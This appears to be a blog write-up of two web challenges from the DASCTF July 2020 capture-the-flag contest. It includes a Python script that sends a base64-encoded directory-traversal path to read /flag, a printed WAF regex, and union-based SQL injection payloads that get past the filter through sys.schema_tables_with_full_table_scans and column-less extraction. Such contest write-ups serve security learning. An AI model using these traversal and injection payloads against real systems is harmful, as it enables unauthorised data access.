DASCTF2020.7月赛

Ezfileinclude

考点:Unix时间戳、文件包含、目录穿越

开局一张图,发现源码 image.php?t=1595664783&f=Z3F5LmpwZw==

img

访问之,回显:What's your time? 仔细看t参数是一个unix时间戳,然后f是base64后的文件名;

直接写脚本,目录穿越读取/flag

import time
import requests
import base64
t = int(time.time())
f = 'gqy.jpg?../../../../../../flag'
f = base64.b64encode(f.encode()).decode()
print(t, f)
host = 'http://183.129.189.60:10009/image.php?t={}&f={}'.format(t, f)
head = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0)',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'
}
r = requests.get(url=host, headers=head)
print(r.text)

SQLi

考点:无列名注入,sys.schema_tables_with_full_table_scans

访问要求传入id参数:

http://183.129.189.60:10004/?id=1;

返回waf:

return preg_match("/;|benchmark|\^|if|[\s]|in|case|when|sleep|auto|desc|stat|\||lock|or|and|&|like|-|`/i", $id); 

stat意味着过滤了sys.schema_table_statistics_with_buffer,sys.x$schema_table_statistics_with_buffer,mysql.innodb_table_stats

or意味着过滤了information_schema

由waf想到了union注入:

?id=0%27union/**/select/**/1,2,3%23
Array ( [0] => 1 [id] => 1 [1] => 2 [username] => 2 [2] => 3 [password] => 3 )

可以看到库名:

?id=0%27union/**/select/**/1,database(),3%23
sqlidb

上述bypass infomation_schema的方法都被过滤了,不过leon师傅在一次开发当中发现了另一个库:sys.schema_tables_with_full_table_scans

?id=0'/**/union/**/select/**/1,group_concat(object_name),3/**/from/**/sys.schema_tables_with_full_table_scans%23
#users,flllaaaggg,sys_config

接下来是无列名注入:

?id=0'/**/union/**/select/**/1,(select/**/a.2/**/from/**/(select/**/1,2/**/union/**/select/**/*/**/from/**/flllaaaggg)a/**/limit/**/1,1),3%23
flag{60325f20416b40b11b6049734bad11cf}
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇